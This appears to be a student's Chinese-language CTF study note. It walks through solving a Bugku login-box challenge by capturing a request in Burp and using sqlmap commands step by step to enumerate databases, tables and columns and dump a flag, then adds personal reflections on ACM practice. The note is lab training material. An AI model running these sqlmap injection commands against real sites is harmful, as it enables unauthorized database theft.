例题目录
[根据校赛的经验来看的话 这种登录的可以先用sqlmap搞一下....]
然后做一个新的web题目 可以先给自己预留5min看会不会解, 不要上来就翻答案n
就5min, 可以两个题,先做题,再补题。
其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了
例题1:这是一个神奇的登录框
sqlmap要结合burp一起使用;
首先啊是抓包,然后保存下来到txt里(直接burp抓了右键copy to file 就好了)
然后开始使用sqlmap(直接在我桌面上就有那个文件)
sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
(admin_name 是在源代码里面找到的..)
(我那个是bat文件 所以要加一个"python")
多试验一下吧,一路选择“Y”,开始并不行,最后好像还是可了:
我们来重复一下那个命令: python sqlmap.py -r "......\05.txt" -p admin_name --dbs
然后继续包bugkusql1这个表
sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
还记得吗 -p 是参数的意思
很快找到两个表
继续 sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表 (在表里面继续找adin_name)
这样的话哇 哇
flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解释:同上面 --dump是获取字段的命令
【关系】数据库--dbs(-D) 到 表名 --tables (-T) 到列名 --columns (-C) 最后--dump
然后命令的话直接回车
哇 然后就对了...... 还是很神奇的
例题2: 成绩单
----------题外话
我觉得acm当时对我来说真的很痛苦的吧
划水的时间太长 错一点小地方 然后总是那个想修修补补 而不是重新开始的心态 什么都写的很慢
我也最多在题意和xx上蹦跶了 当个散户的话锻炼脑子 没事的时候鼓捣一下也挺好 w
就这样吧 不放弃 还能干吗